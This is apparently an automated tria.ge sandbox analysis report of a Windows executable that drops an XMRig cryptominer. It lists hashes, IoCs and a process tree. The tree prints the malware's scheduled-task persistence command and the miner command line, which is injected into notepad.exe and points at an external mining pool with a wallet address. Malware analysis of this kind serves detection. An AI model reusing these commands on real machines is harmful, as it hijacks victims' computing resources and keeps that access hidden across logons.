Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
147s -
max time network
141s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
30/12/2023, 04:14
Static task
static1
Behavioral task
behavioral1
Sample
0e15f9d8151c82ab4b82f47b7177af7b.exe
Resource
win7-20231129-en
General
-
Target
0e15f9d8151c82ab4b82f47b7177af7b.exe
-
Size
311KB
-
MD5
0e15f9d8151c82ab4b82f47b7177af7b
-
SHA1
e4ec0960b2b76e969f219298554fa55f09fe7cce
-
SHA256
8ca50265b5e333bd3c1dfd1b2cbce8d011fdbc94aafd33d73b3bca35c32651cc
-
SHA512
09b21ec489fb3276907572ebf9ff729853c1c07fd405f031c6a006d94785f08eef6a11e7065e5c7c9dd6cb2852939f8d473df4774f89f35dec33eb448319f5e3
-
SSDEEP
6144:5/IsgxG1RdAZZ1llyP/WBSgTY7cT7w5fof:5/UxG/21loPuk8Y7Co
Malware Config
Signatures
-
XMRig Miner payload 15 IoCs
resource yara_rule behavioral2/memory/4064-68-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/4064-69-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/4064-71-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/4064-75-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/4064-76-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/4064-78-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/4064-79-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/4064-77-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/4064-74-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/4064-80-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/4064-81-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/4064-83-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/4064-84-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/4064-85-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/4064-86-0x0000000140000000-0x0000000140786000-memory.dmp xmrig -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\International\Geo\Nation 0e15f9d8151c82ab4b82f47b7177af7b.exe Key value queried \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\International\Geo\Nation services64.exe -
Executes dropped EXE 2 IoCs
pid Process 4656 services64.exe 1984 sihost64.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4656 set thread context of 4064 4656 services64.exe 114 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1568 schtasks.exe 1212 schtasks.exe -
Modifies registry class 7 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000_Classes\CID\{5A006500-4B00-3700-7300-340049006200}\1 = "9PCpImd1P/JAb7evk5zEd9w+IJaX5DtcQCzDyIKrNbw+lb20PZyKepLdTtW2h7/M1PwJzYa3CSZCiVtdCJFfyz/nLG/so5XsuDISVFBrw7BUi1nBywzWduZkoYAB9KsjZjKwCckUIZZb2sz4Z3StONJjmfH/Krl7/oQC4jhqFLrKOzQ71PSl/cv9FQOjX5bc" services64.exe Set value (str) \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000_Classes\CID\{6C004800-4C00-4400-3900-4E0048006500}\1 = "QFV9Lpttj31udWbUrMVpr8TVhttzLaV45MUXmwlmgxJAicV3rdRvx9fBmdU8Eie5lvjBbgo4N32qQLYF+3JZBdIrGLjpS+jFjiwATHBD/bm0Y7rnfZ/i0+dusbIC2KPoDicxbBgKs5qRaxS6w+8rFwYF4gVd0vZDS65bsuJjhkyAqyOsbf8D/4QXSKJHaVYLT+53XrFhx19VUUmKZGc+rr6NCSwVBFHFOQab0minGofIgVJRGM5x36V+f4yfgwqOAyYQiaeKZs+V2TKJ1Dd/2/wWpx3sJ8GYLGmFL0Bg6VJ1rJ/Ev1cCva5N96XXPOZkChXsCXCMB32eiFwwk+GLeq3dw02DMWaIZEWzDpvXOf6m6/r8Oe8Hz9BzKUWjB4W+dMJ5NpWsAnrOtk5zt16Nt8EvBBoBXJ1n6OdkxNGNJzF3P/2cFq/1/eLN8fKxNAqP0t2OKgiVIdETKq7GO8IrnQ==" services64.exe Key created \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000_Classes\CID\{6C004800-4C00-4400-3900-4E0048006500} 0e15f9d8151c82ab4b82f47b7177af7b.exe Key created \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000_Classes\CID 0e15f9d8151c82ab4b82f47b7177af7b.exe Set value (str) \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000_Classes\CID\{6C004800-4C00-4400-3900-4E0048006500}\1 = "QFV9Lpttj31udWbUrMVpr8TVhttzLaV45MUXmwlmgxJAicV3rdRvx9fBmdU8Eie5lvjBbgo4N32qQLYF+3JZBdIrGLjpS+jFjiwATHBD/bm0Y7rnfZ/i0+dusbIC2KPoDicxbBgKs5qRaxS6w+8rFwYF4gVd0vZDS65bsuJjhkyAqyOsbf8D/4QXSKJHaVYLT+53XrFhx19VUUmKZGc+rr6NCSwVBFHFOQab0minGofIgVJRGM5x36V+f4yfgwqOAyYQiaeKZs+V2TKJ1Dd/2/wWpx3sJ8GYLGmFL0Bg6VJ1rJ/Ev1cCva5N96XXPOZkChXsCXCMB32eiFwwk+GLeq3dw02DMWaIZEWzDpvXOf6m6/r8Oe8Hz9BzKUWjB4W+dMJ5NpWsAnrOtk5zt16Nt8EvBBoBXJ1n6OdkxNGNJzF3P/2cFq/1/eLN8fKxNAqP0t2OKgiVIdETKq7GO8IrnQ==" 0e15f9d8151c82ab4b82f47b7177af7b.exe Key created \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000_Classes\CID\{5A006500-4B00-3700-7300-340049006200} 0e15f9d8151c82ab4b82f47b7177af7b.exe Set value (str) \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000_Classes\CID\{5A006500-4B00-3700-7300-340049006200}\1 = "3RocgVTwHxuYT4d/ZbBrh41Lv0W5zzugud+nSKjiDWlwaPvakkJgK6vU01/fzhmne/aM88vXbC+ol8stYM+Dote6yHE3XdXWzN8JwhXZK4qSC99tgGWCFHmf+GcnOB7X2OTyc9vZMZ9JdXEPmNhVmNu4ANHHCTvjwBE24rv3Zv/nYWzpeOitnAJPrcQt/C3F" 0e15f9d8151c82ab4b82f47b7177af7b.exe -
NTFS ADS 12 IoCs
description ioc Process File created C:\Users\Admin\Documents\My Music:{6C004800-4C00-4400-3900-4E0048006500} 0e15f9d8151c82ab4b82f47b7177af7b.exe File created C:\odt:{6C004800-4C00-4400-3900-4E0048006500} 0e15f9d8151c82ab4b82f47b7177af7b.exe File created C:\odt:{5A006500-4B00-3700-7300-340049006200} 0e15f9d8151c82ab4b82f47b7177af7b.exe File opened for modification C:\odt:{5A006500-4B00-3700-7300-340049006200} services64.exe File opened for modification C:\odt:{6C004800-4C00-4400-3900-4E0048006500} services64.exe File created C:\Users\Admin\Documents\My Music:{6C004800-4C00-4400-3900-4E0048006500} services64.exe File created C:\Users\Admin\AppData\Local\Temp:{6C004800-4C00-4400-3900-4E0048006500} 0e15f9d8151c82ab4b82f47b7177af7b.exe File created C:\Users\Admin\AppData\Local\Temp:{5A006500-4B00-3700-7300-340049006200} 0e15f9d8151c82ab4b82f47b7177af7b.exe File created C:\Users\Admin\Documents\My Music:{5A006500-4B00-3700-7300-340049006200} 0e15f9d8151c82ab4b82f47b7177af7b.exe File created C:\Users\Admin\AppData\Roaming:{5A006500-4B00-3700-7300-340049006200} services64.exe File created C:\Users\Admin\Documents\My Music:{5A006500-4B00-3700-7300-340049006200} services64.exe File created C:\Users\Admin\AppData\Roaming:{6C004800-4C00-4400-3900-4E0048006500} services64.exe -
Suspicious behavior: EnumeratesProcesses 58 IoCs
pid Process 4780 0e15f9d8151c82ab4b82f47b7177af7b.exe 4780 0e15f9d8151c82ab4b82f47b7177af7b.exe 4780 0e15f9d8151c82ab4b82f47b7177af7b.exe 4780 0e15f9d8151c82ab4b82f47b7177af7b.exe 4656 services64.exe 4656 services64.exe 4656 services64.exe 4656 services64.exe 4064 notepad.exe 4064 notepad.exe 4064 notepad.exe 4064 notepad.exe 4064 notepad.exe 4064 notepad.exe 4064 notepad.exe 4064 notepad.exe 4064 notepad.exe 4064 notepad.exe 4064 notepad.exe 4064 notepad.exe 4064 notepad.exe 4064 notepad.exe 4064 notepad.exe 4064 notepad.exe 4064 notepad.exe 4064 notepad.exe 4064 notepad.exe 4064 notepad.exe 4064 notepad.exe 4064 notepad.exe 4064 notepad.exe 4064 notepad.exe 4064 notepad.exe 4064 notepad.exe 4064 notepad.exe 4064 notepad.exe 4064 notepad.exe 4064 notepad.exe 4064 notepad.exe 4064 notepad.exe 4064 notepad.exe 4064 notepad.exe 4064 notepad.exe 4064 notepad.exe 4064 notepad.exe 4064 notepad.exe 4064 notepad.exe 4064 notepad.exe 4064 notepad.exe 4064 notepad.exe 4064 notepad.exe 4064 notepad.exe 4064 notepad.exe 4064 notepad.exe 4064 notepad.exe 4064 notepad.exe 4064 notepad.exe 4064 notepad.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 4780 0e15f9d8151c82ab4b82f47b7177af7b.exe Token: SeDebugPrivilege 4656 services64.exe Token: SeLockMemoryPrivilege 4064 notepad.exe Token: SeLockMemoryPrivilege 4064 notepad.exe -
Suspicious use of WriteProcessMemory 27 IoCs
description pid Process procid_target PID 4780 wrote to memory of 3696 4780 0e15f9d8151c82ab4b82f47b7177af7b.exe 102 PID 4780 wrote to memory of 3696 4780 0e15f9d8151c82ab4b82f47b7177af7b.exe 102 PID 3696 wrote to memory of 1568 3696 cmd.exe 104 PID 3696 wrote to memory of 1568 3696 cmd.exe 104 PID 4780 wrote to memory of 4656 4780 0e15f9d8151c82ab4b82f47b7177af7b.exe 105 PID 4780 wrote to memory of 4656 4780 0e15f9d8151c82ab4b82f47b7177af7b.exe 105 PID 4656 wrote to memory of 3840 4656 services64.exe 108 PID 4656 wrote to memory of 3840 4656 services64.exe 108 PID 4656 wrote to memory of 1984 4656 services64.exe 110 PID 4656 wrote to memory of 1984 4656 services64.exe 110 PID 3840 wrote to memory of 1212 3840 cmd.exe 111 PID 3840 wrote to memory of 1212 3840 cmd.exe 111 PID 4656 wrote to memory of 4064 4656 services64.exe 114 PID 4656 wrote to memory of 4064 4656 services64.exe 114 PID 4656 wrote to memory of 4064 4656 services64.exe 114 PID 4656 wrote to memory of 4064 4656 services64.exe 114 PID 4656 wrote to memory of 4064 4656 services64.exe 114 PID 4656 wrote to memory of 4064 4656 services64.exe 114 PID 4656 wrote to memory of 4064 4656 services64.exe 114 PID 4656 wrote to memory of 4064 4656 services64.exe 114 PID 4656 wrote to memory of 4064 4656 services64.exe 114 PID 4656 wrote to memory of 4064 4656 services64.exe 114 PID 4656 wrote to memory of 4064 4656 services64.exe 114 PID 4656 wrote to memory of 4064 4656 services64.exe 114 PID 4656 wrote to memory of 4064 4656 services64.exe 114 PID 4656 wrote to memory of 4064 4656 services64.exe 114 PID 4656 wrote to memory of 4064 4656 services64.exe 114 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\0e15f9d8151c82ab4b82f47b7177af7b.exe"C:\Users\Admin\AppData\Local\Temp\0e15f9d8151c82ab4b82f47b7177af7b.exe"1⤵
- Checks computer location settings
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4780 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit2⤵
- Suspicious use of WriteProcessMemory
PID:3696 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'3⤵
- Creates scheduled task(s)
PID:1568
-
-
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4656 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit3⤵
- Suspicious use of WriteProcessMemory
PID:3840 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'4⤵
- Creates scheduled task(s)
PID:1212
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"3⤵
- Executes dropped EXE
PID:1984
-
-
C:\Windows\System32\notepad.exeC:\Windows/System32\notepad.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.xmr.pt:5555 --user=42LWroKkaot7k6VU59vZyz7kxmhQGgWJhfdrEhV5GBkQ1Q6DqNRmoDALTM4PoM5n2JcS4t4wYDXTfWR8oyM8XfQhQxXhvdU --pass=144 --cpu-max-threads-hint=40 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=1 --cinit-idle-cpu=90 --cinit-stealth3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4064
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
384B
MD5ed40858472a31df7ec5f10c78c15fae8
SHA1f71c1a7a27bff6a61332c88f6b12f7b7092b3cd5
SHA256c55e2060b15aae7782a8984124d88c2494ed0ca37af19591131c70603a9d9b32
SHA512f29e2c8e5088919350818e679c542b43159d6b687ecfc5c6708d4b65ea909bd32267db952fcd7004ae6d81a4083843c86b11ba9f2f4529efc5db75863dc8488d
-
Filesize
7KB
MD5d98e2e312d89e8e7c0eabcc4218ebae1
SHA13e12d8fe74ceaca24981252570dfbc5cc4359273
SHA256613e54d34f69bba549edc48177cfa7d96b5f97761acfc4211e79dfcafdd0fa9d
SHA512fee151f8317f083ca4d8898c933e7d07f024af909da2a99ed2d385b16a4f806b9aea422117a5fd146f3850b2e79a7913cbd741442091b5a4257fbf660e235b38
-
Filesize
311KB
MD50e15f9d8151c82ab4b82f47b7177af7b
SHA1e4ec0960b2b76e969f219298554fa55f09fe7cce
SHA2568ca50265b5e333bd3c1dfd1b2cbce8d011fdbc94aafd33d73b3bca35c32651cc
SHA51209b21ec489fb3276907572ebf9ff729853c1c07fd405f031c6a006d94785f08eef6a11e7065e5c7c9dd6cb2852939f8d473df4774f89f35dec33eb448319f5e3
-
Filesize
472B
MD57c404a6b5c0c3c82a21cdf3c97321541
SHA1bdc0e9c3286debe4b84c5aff0f64f811d7633cf2
SHA2562a5e0d712d8b19a344cbbf8197f76caf5a26986d9d13d6d5b351d1a3dca5db18
SHA51209213c0aea456891be7c43b19fe423fa1ac7883098a976bbc32bf2340e557be72794364cbabed347085dcd22345cdb8b17799813eacb556fd857dc1d7d0acb84